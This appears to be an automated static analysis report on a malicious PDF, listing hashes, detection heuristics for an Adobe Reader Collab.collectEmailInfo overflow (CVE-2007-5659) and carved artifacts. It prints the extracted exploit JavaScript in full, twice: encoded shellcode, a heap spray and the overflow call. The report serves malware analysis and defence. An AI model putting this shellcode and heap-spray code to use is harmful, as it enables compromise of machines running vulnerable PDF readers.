Malicious PDF — malware analysis report

Static analysis result for SHA-256 f5ab535afa5298a9…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-10
MD5: 29b6854b5c6039eb2b1da755cb97aa6c SHA-1: 18dd60be54844e15d3c7494411f2ebae2ee6ec81 SHA-256: f5ab535afa5298a9e8aca0e6fa7e5a1a63246ca9fbbcf1710b5c0d25cffdcdb5
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0031_000.js', is likely responsible for executing malicious code. Additionally, a large, potentially obfuscated binary stream ('stream_010_off00001ec1.bin') was extracted, suggesting a downloader or dropper functionality. The exact intent of the script is unclear due to potential obfuscation, but its presence strongly suggests a malicious payload delivery mechanism.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9980

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 1206312 bytes
SHA-256: d5005e6ee2e649716afeda73fc5624d60ddac2ec2e3497a03f11116991a6a4e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 8.00, consistent with packed or encrypted content.
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 7882 bytes
SHA-256: b7e432e4bc5941899646b3a945b2fa65300512e20c2b41f00b9b4e1d49047128
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30%u\x39\x30\x39\x30%u\x65\x62\x39\x30%u5\x6518%u5\x6256%u068\x61%u303\x63%u1474%u6\x6266%u49\x630"+
"%u8\x6146%u\x33226%u88\x634%u430\x33%u\x65\x6246%u\x658\x65\x62%u\x66\x66\x653%u\x66\x66\x66\x66"+
"%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444"+
"%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41"+
"%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41"+
"%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743"+
"%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942"+
"%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044"+
"%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43"+
"%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44"+
"%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942"+
"%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b"+
"%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444"+
"%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844"+
"%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743"+
"%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d"+
"%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43"+
"%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643"+
"%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846"+
"%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744"+
"%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244"+
"%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d"+
"%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942"+
"%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44"+
"%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441"+
"%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942"+
"%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445"+
"%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444"+
"%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343"+
"%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52"+
"%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641"+
"%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641"+
"%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143"+
"%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143"+
"%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641"+
"%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644"+
"%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343"+
"%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43"+
"%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142"+
"%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b"+
"%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445"+
"%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942"+
"%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641"+
"%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242"+
"%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444"+
"%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444"+
"%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43"+
"%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444"+
"%u5942%u7a47%u7141%u6445%u4b41%u674b%u6444%u4541%u4541%u4e43%u5942%u6541"+
"%u5142%u4d41%u7141%u7143%u5845%u6141%u4c43%u6444%u6444%u6444%u5849%u7a47"+
"%u7541%u5942%u5643%u6c44%u5942%u7a47%u6844%u4841%u6941%u7444%u5947%u5942"+
"%u4841%u4b43%u7641%u6e43%u7541%u6141%u5043%u6444%u6444%u6444%u6445%u4b41"+
"%u6c44%u6444%u4541%u4541%u4541%u4e43%u5942%u6541%u4843%u5942%u7a47%u6c44"+
"%u784d%u4b43%u6744%u5942%u7a52%u5142%u4941%u674b%u784d%u5942%u7641%u7741"+
"%u7741%u7741%u5a45%u5a41%u4744%u4241%u5342%u6841%u5242%u5242%u5242%u5242"+
"%u6f43%u4445%u5a45%u4841%u5242%u5242%u6444%u6444%u6e43%u6244%u4841%u4445"+
"%u7444%u5142%u4941%u6644%u5941%u6841%u784b%u4b41%u6447%u6445%u4b41%u674b"+
"%u6444%u7641%u4144%u674b%u4444%u5a4a%u6444%u7641%u4144%u6c44%u4444%u5a4a"+
"%u6444%u7641%u4144%u6444%u4444%u5a4a%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444"+
"%u3030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new Array();
for (afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 7426 bytes
SHA-256: 5a006981b3ebab1ac7a2d149a61e01c4f9f34a214900d9ce1903307f71fb2a30
Detection
ClamAV: No threats found
Obfuscation or payload: likely
9 of 18 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u49c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u4445%u5843%u6544%u6444%u6444%u4d43%u5744%u4941%u5a4e%u5942%u5a4a%u5444%u5942%u5a4a%u6844%u5942%u6b43%u7844%u584d%u5942%u5a4a%u6c44%u4543%u4a41%u584d%u4b43%u4943%u6141%u6944%u6444%u6444%u6444%u5849%u6344%u5142%u4d41%u6c44%u5142%u4e41%u674b%u584b%u7841%u6e43%u6541%u4a41%u7a4a%u5942%u7743%u474b%u474b%u5942%u7a47%u5844%u5942%u4f43%u4c44%u6343%u6744%u7845%u5942%u5143%u7a52%u5942%u4143%u4444%u6744%u5441%u6a41%u5044%u5243%u5942%u5044%u5942%u6744%u5845%u5744%u7641%u5744%u4941%u7541%u5a46%u5642%u4941%u6f43%u6344%u4841%u4641%u6944%u6744%u7141%u6241%u5945%u584b%u6743%u474b%u4c44%u6e43%u6841%u5942%u4143%u474b%u6744%u5441%u5947%u5942%u6844%u5043%u5942%u4143%u7844%u6744%u5441%u5942%u674b%u5942%u6744%u4c41%u5849%u7a4e%u474b%u7844%u7a43%u4a41%u4e41%u7a47%u5a4e%u6444%u6444%u6444%u6444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7343%u6444%u674b%u6444%u6444%u7641%u6e43%u5844%u7641%u6e43%u5343%u7641%u4e43%u7a52%u5744%u6445%u5947%u5942%u5643%u4743%u5942%u6643%u5844%u5942%u5a45%u6142%u4445%u4446%u4e41%u5a46%u5644%u4a41"+
"%u5644%u4b41%u7842%u7741%u4241%u7741%u4341%u6b41%u5945%u7143%u6444%u784d%u7a47%u7a4a%u4b43%u7641%u6e43%u4743%u5942%u4e43%u5844%u4943%u7641%u6e43%u5743%u7641%u4e43%u7844%u5942%u4e43%u7a4a%u4d44%u4e43%u4343%u5142%u6643%u4343%u6444%u6443%u4446%u7641%u6e43%u5743%u7641%u4e43%u6c44%u4a41%u7846%u5543%u6a44%u6541%u5142%u6b42%u6742%u6343%u7241%u4542%u7441%u6b44%u5744%u4341%u5842%u6447%u5443%u6744%u4e41%u6d42%u7742%u7344%u6444%u6743%u7244%u5a47%u7341%u7444%u416e%u6243%u6e44%u6141%u5a46%u6c44%u5341%u6d43%u584d%u4942%u6643%u5641%u4a42%u7741%u5842%u6a44%u6541%u4542%u6744%u6844%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6942%u6942%u6942%u6942%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6f43%u5a47%u7643%u6b43%u4a44%u5a47%u6343%u5a47%u6444%u6141%u6444%u6444%u6444%u6444%u4643%u5342%u6441%u6d43%u6444%u6444%u6444%u6141%u5a46%u7741%u7641%u7641%u5942%u5941%u5942%u5845%u5942%u7741%u5942%u4741%u5142%u4841%u5444%u6141%u5946%u7741%u7641"+
"%u7641%u5744%u6445%u5849%u5643%u5343%u5142%u7a47%u5343%u674b%u5744%u6445%u4a43%u7641%u6e43%u5343%u7641%u4e43%u474b%u5944%u5242%u6842%u7644%u6444%u6943%u6541%u5944%u5242%u6942%u7644%u6444%u6c43%u6c41%u7343%u7641%u6444%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5a52%u4b43%u7343%u7641%u6444%u6444%u6444%u7641%u4e43%u6844%u5942%u4141%u5942%u7a47%u5a52%u6744%u4841%u5142%u6141%u6144%u4f41%u6444%u6444%u7641%u6e43%u5a52%u7641%u4e43%u7444%u7143%u6444%u7143%u6444%u7343%u6444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u7143%u6444%u784d%u7a47%u4743%u4b43%u7143%u674b%u784d%u7a47%u4f43%u4b43%u7641%u6e43%u5343%u7641%u4e43%u7a52%u7143%u6444%u7143%u6444%u7343%u7444%u416e%u6444%u6444%u7641%u6e43%u5343%u7641%u4e43%u4444%u4e43%u7143%u6444%u7343%u5242%u6444%u6444%u6444%u7143%u6644%u7143%u6444%u7143%u6544%u7343%u6444%u6444%u6444%u5a4a%u784d%u7a47%u7343%u4b43%u5142%u7a47%u7044%u6144%u6241%u6e44%u5942%u5845%u5942%u7641%u4e43%u5942%u6541%u7641%u5947%u7044%u6141%u7841%u7641%u7641%u7641%u4643%u5142%u7141%u7641%u6e43%u6644%u6241%u5a4b%u5849%u7a47%u5743%u7343%u6444%u674b%u6444%u6444%u7143%u5a4a%u7641%u4e43%u4844%u5849%u7a47%u5844%u5942%u7a47"+
"%u4f43%u5849%u7a47%u4343%u6141%u5143%u7741%u7641%u7641%u4e43%u5744%u6445%u4a43%u784d%u7a47%u7343%u4b43%u5142%u7a47%u4c44%u6144%u6241%u6e44%u5942%u5845%u4242%u4242%u4e43%u5942%u6541%u7641%u5947%u4c44%u6141%u7841%u7641%u7641%u7641%u4643%u7143%u6444%u7143%u7641%u7641%u4e43%u674b%u4242%u4242%u4242%u4e43%u5942%u6541%u5142%u4d41%u5945%u7143%u5845%u6141%u7946%u6444%u6444%u6444%u5849%u7a47%u7541%u7641%u6e43%u6c44%u6141%u5743%u6444%u6444%u6444%u5849%u7a47%u5945%u7143%u6444%u784d%u7a47%u7141%u4b43%u7641%u6e43%u5945%u7641%u6e43%u6c44%u7641%u6e43%u7541%u6141%u6843%u6444%u6444%u6444%u5942%u7a47%u7141%u6445%u4b41%u674b%u6444%u4541%u4541%u4e43%u5942%u6541%u5142%u4d41%u7141%u7143%u5845%u6141%u4c43%u6444%u6444%u6444%u5849%u7a47%u7541%u5942%u5643%u6c44%u5942%u7a47%u6844%u4841%u6941%u7444%u5947%u5942%u4841%u4b43%u7641%u6e43%u7541%u6141%u5043%u6444%u6444%u6444%u6445%u4b41%u6c44%u6444%u4541%u4541%u4541%u4e43%u5942%u6541%u4843%u5942%u7a47%u6c44%u784d%u4b43%u6744%u5942%u7a52%u5142%u4941%u674b%u784d%u5942%u7641%u7741%u7741%u7741%u5a45%u5a41%u4744%u4241%u5342%u6841%u5242%u5242%u5242%u5242%u6f43%u4445%u5a45%u4841%u5242%u5242%u6444%u6444%u6e43%u6244%u4841%u4445"+
"%u7444%u5142%u4941%u6644%u5941%u6841%u784b%u4b41%u6447%u6445%u4b41%u674b%u6444%u7641%u4144%u674b%u4444%u5a4a%u6444%u7641%u4144%u6c44%u4444%u5a4a%u6444%u7641%u4144%u6444%u4444%u5a4a%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u6444%u3030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new Array();
for (afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});

Open this report in the interactive analyzer, or submit your own file for analysis.